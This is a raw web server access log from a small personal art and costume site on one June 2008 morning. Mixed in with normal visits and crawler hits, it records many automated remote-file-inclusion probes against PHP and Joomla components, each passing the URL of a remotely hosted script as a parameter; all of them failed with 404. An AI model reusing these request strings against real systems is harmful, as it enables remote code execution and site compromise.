213.156.52.97 - - [12/Jun/2008:04:39:09 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
213.156.52.97 - - [12/Jun/2008:04:39:16 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
213.156.52.97 - - [12/Jun/2008:04:39:17 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
213.156.52.97 - - [12/Jun/2008:04:39:17 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
213.156.52.97 - - [12/Jun/2008:04:39:17 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
65.55.208.119 - - [12/Jun/2008:04:50:06 -0500] "GET /logs/access_log.1165190400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.249.108.180 - - [12/Jun/2008:04:50:11 -0500] "GET /logs/index1.php?page=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.249.108.180 - - [12/Jun/2008:04:50:12 -0500] "GET /index1.php?page=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.6.24.163 - - [12/Jun/2008:04:54:16 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [12/Jun/2008:04:54:17 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.119 - - [12/Jun/2008:04:55:51 -0500] "GET /logs/access_log.1189641600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:55:51 -0500] "GET /logs/access_log.1168905600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:55:51 -0500] "GET /logs/access_log.1175990400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:55:51 -0500] "GET /logs/access_log.1199145600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:55:52 -0500] "GET /logs/access_log.1180137600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:56:37 -0500] "GET /logs/access_log.1194393600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:56:37 -0500] "GET /logs/access_log.1166054400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:56:38 -0500] "GET /artwork/furniture-misc.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [12/Jun/2008:04:56:38 -0500] "GET /logs/access_log.1195603200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.53.197.2 - - [12/Jun/2008:05:02:39 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
74.53.197.2 - - [12/Jun/2008:05:02:39 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
160.99.12.231 - - [12/Jun/2008:05:06:51 -0500] "GET /logs/index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
160.99.12.231 - - [12/Jun/2008:05:06:51 -0500] "GET /index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
72.36.222.34 - - [12/Jun/2008:05:06:53 -0500] "GET /logs/index1.php?p=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:05:06:53 -0500] "GET /index1.php?p=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:05:13:45 -0500] "GET /logs/index1.php?page=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:05:13:46 -0500] "GET /index1.php?page=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
85.114.141.48 - - [12/Jun/2008:05:21:38 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
85.114.141.48 - - [12/Jun/2008:05:21:38 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:05:24:03 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:05:24:06 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:05:24:09 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:05:24:12 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.2.100.138 - - [12/Jun/2008:05:25:56 -0500] "GET /logs/access_log.1183507200//tools/send_reminders.php?noSet=0&includedir=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:05:25:57 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:05:25:57 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
74.6.22.89 - - [12/Jun/2008:05:32:00 -0500] "GET /?S=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.132 - - [12/Jun/2008:05:34:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [12/Jun/2008:05:34:33 -0500] "GET /?N=A HTTP/1.1" 200 1243 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.230.197.245 - - [12/Jun/2008:05:36:21 -0500] "GET /logs/access_log.1208649600/index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
66.230.197.245 - - [12/Jun/2008:05:36:21 -0500] "GET /index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.230.197.245 - - [12/Jun/2008:05:36:21 -0500] "GET /logs/index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
62.128.131.80 - - [12/Jun/2008:05:36:25 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Jun/2008:05:36:25 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
67.19.197.98 - - [12/Jun/2008:05:38:20 -0500] "GET //errors.php?error=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
87.237.209.228 - - [12/Jun/2008:05:39:30 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
87.237.209.228 - - [12/Jun/2008:05:39:31 -0500] "GET //skin/zero_vote/error.php?dir=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
74.6.22.89 - - [12/Jun/2008:05:41:25 -0500] "GET /logs/access_log.1173571200 HTTP/1.0" 200 219925 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.241.217.240 - - [12/Jun/2008:05:44:46 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
212.241.217.240 - - [12/Jun/2008:05:44:47 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
208.80.193.42 - - [12/Jun/2008:05:44:51 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.2)"
160.99.12.231 - - [12/Jun/2008:05:46:19 -0500] "GET /logs/access_log.1208649600/index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.230.197.245 - - [12/Jun/2008:05:48:38 -0500] "GET /logs/access_log.1186358400/index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
77.79.246.200 - - [12/Jun/2008:05:52:58 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tugaspeed.info/system.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
77.79.246.200 - - [12/Jun/2008:05:52:58 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tugaspeed.info/system.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
67.19.197.98 - - [12/Jun/2008:05:53:12 -0500] "GET //errors.php?error=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
82.102.10.211 - - [12/Jun/2008:05:54:11 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:05:54:11 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
193.151.24.4 - - [12/Jun/2008:05:54:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
193.151.24.4 - - [12/Jun/2008:05:54:19 -0500] "GET //skin/zero_vote/error.php?dir=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
69.89.25.171 - - [12/Jun/2008:05:56:30 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
69.89.25.171 - - [12/Jun/2008:05:56:30 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
66.98.140.99 - - [12/Jun/2008:05:56:36 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
66.98.140.99 - - [12/Jun/2008:05:56:36 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
160.99.12.231 - - [12/Jun/2008:05:57:03 -0500] "GET /logs/access_log.1186358400/index1.php?p=http://medisana.co.kr/test?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
66.98.244.6 - - [12/Jun/2008:05:58:04 -0500] "GET /logs/db.php?path_local=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.98.244.6 - - [12/Jun/2008:05:58:04 -0500] "GET /db.php?path_local=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
69.89.21.97 - - [12/Jun/2008:05:58:04 -0500] "GET /logs/db.php?path_local=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
69.89.21.97 - - [12/Jun/2008:05:58:04 -0500] "GET /db.php?path_local=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 290 "-""libwww-perl/5.812"
74.6.22.89 - - [12/Jun/2008:05:58:06 -0500] "GET /logs/access_log.1174608000 HTTP/1.0" 200 127945 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.89.22.130 - - [12/Jun/2008:05:58:10 -0500] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
69.89.22.130 - - [12/Jun/2008:05:58:10 -0500] "GET //components/com_mambowiki/MamboLogin.php?IP=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.812"
207.44.238.63 - - [12/Jun/2008:05:58:39 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
207.44.238.63 - - [12/Jun/2008:05:58:39 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
74.52.66.242 - - [12/Jun/2008:05:59:07 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
74.52.66.242 - - [12/Jun/2008:05:59:07 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
77.55.90.2 - - [12/Jun/2008:05:59:37 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
77.55.90.2 - - [12/Jun/2008:05:59:37 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.64"
77.55.90.2 - - [12/Jun/2008:06:03:20 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
77.55.90.2 - - [12/Jun/2008:06:03:20 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.64"
207.44.238.63 - - [12/Jun/2008:06:07:45 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
207.44.238.63 - - [12/Jun/2008:06:07:45 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
207.44.238.63 - - [12/Jun/2008:06:08:38 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
207.44.238.63 - - [12/Jun/2008:06:08:38 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
80.93.62.112 - - [12/Jun/2008:06:09:16 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.purjus.fr/actedeco/me.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
80.93.62.112 - - [12/Jun/2008:06:09:16 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.purjus.fr/actedeco/me.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
201.130.79.73 - - [12/Jun/2008:06:12:15 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
201.130.79.73 - - [12/Jun/2008:06:12:16 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
216.80.70.10 - - [12/Jun/2008:06:24:38 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
216.80.70.10 - - [12/Jun/2008:06:24:39 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
216.80.70.10 - - [12/Jun/2008:06:24:40 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
216.80.70.10 - - [12/Jun/2008:06:24:41 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
82.102.10.211 - - [12/Jun/2008:06:29:52 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
82.102.10.211 - - [12/Jun/2008:06:29:53 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
216.246.124.244 - - [12/Jun/2008:06:31:49 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
216.246.124.244 - - [12/Jun/2008:06:31:49 -0500] "GET //skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
62.2.100.138 - - [12/Jun/2008:06:36:50 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:06:36:51 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:06:37:52 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
62.2.100.138 - - [12/Jun/2008:06:37:52 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.italialex.com/themes/ItaliaLexCom/themes/PostNuke-V/thumbs/ini/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
74.6.22.89 - - [12/Jun/2008:06:38:37 -0500] "GET /logs/access_log.1200009600 HTTP/1.0" 200 249080 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.204.165 - - [12/Jun/2008:06:41:26 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
91.121.204.165 - - [12/Jun/2008:06:41:26 -0500] "GET //skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
77.55.90.2 - - [12/Jun/2008:06:47:32 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
77.55.90.2 - - [12/Jun/2008:06:47:32 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.64"
91.121.204.165 - - [12/Jun/2008:06:48:21 -0500] "GET /logs/access_log.1208649600//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
91.121.204.165 - - [12/Jun/2008:06:48:21 -0500] "GET //skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
91.121.204.165 - - [12/Jun/2008:06:48:21 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
91.121.204.165 - - [12/Jun/2008:06:48:27 -0500] "GET /logs/access_log.1204156800//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
216.246.124.244 - - [12/Jun/2008:06:50:21 -0500] "GET /logs/access_log.1208649600//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
216.246.124.244 - - [12/Jun/2008:06:50:21 -0500] "GET //skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
216.246.124.244 - - [12/Jun/2008:06:50:21 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
216.246.124.244 - - [12/Jun/2008:06:50:28 -0500] "GET /logs/access_log.1204156800//skin/zero_vote/error.php?dir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
213.42.2.27 - - [12/Jun/2008:06:54:27 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.42.2.27 - - [12/Jun/2008:06:54:28 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
195.229.241.181 - - [12/Jun/2008:06:54:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.22.89 - - [12/Jun/2008:06:55:53 -0500] "GET /rachel%2520study HTTP/1.0" 404 286 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.189 - - [12/Jun/2008:06:57:45 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.154.38.121 - - [12/Jun/2008:07:01:10 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
80.154.38.121 - - [12/Jun/2008:07:06:21 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
65.55.209.1 - - [12/Jun/2008:07:14:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.1 - - [12/Jun/2008:07:14:36 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
203.200.89.107 - - [12/Jun/2008:07:28:52 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
203.200.89.107 - - [12/Jun/2008:07:28:57 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
208.223.208.181 - - [12/Jun/2008:07:39:32 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""shelob v1.0"
207.44.238.63 - - [12/Jun/2008:07:44:39 -0500] "GET /logs/index1.php?x=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.44.238.63 - - [12/Jun/2008:07:44:39 -0500] "GET /index1.php?x=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.55.208.134 - - [12/Jun/2008:07:47:25 -0500] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.98.71 - - [12/Jun/2008:07:49:18 -0500] "GET /logs//mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.106.98.71 - - [12/Jun/2008:07:49:18 -0500] "GET //mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jun/2008:07:49:43 -0500] "GET /logs//mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jun/2008:07:49:43 -0500] "GET //mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
125.161.41.137 - - [12/Jun/2008:07:50:24 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
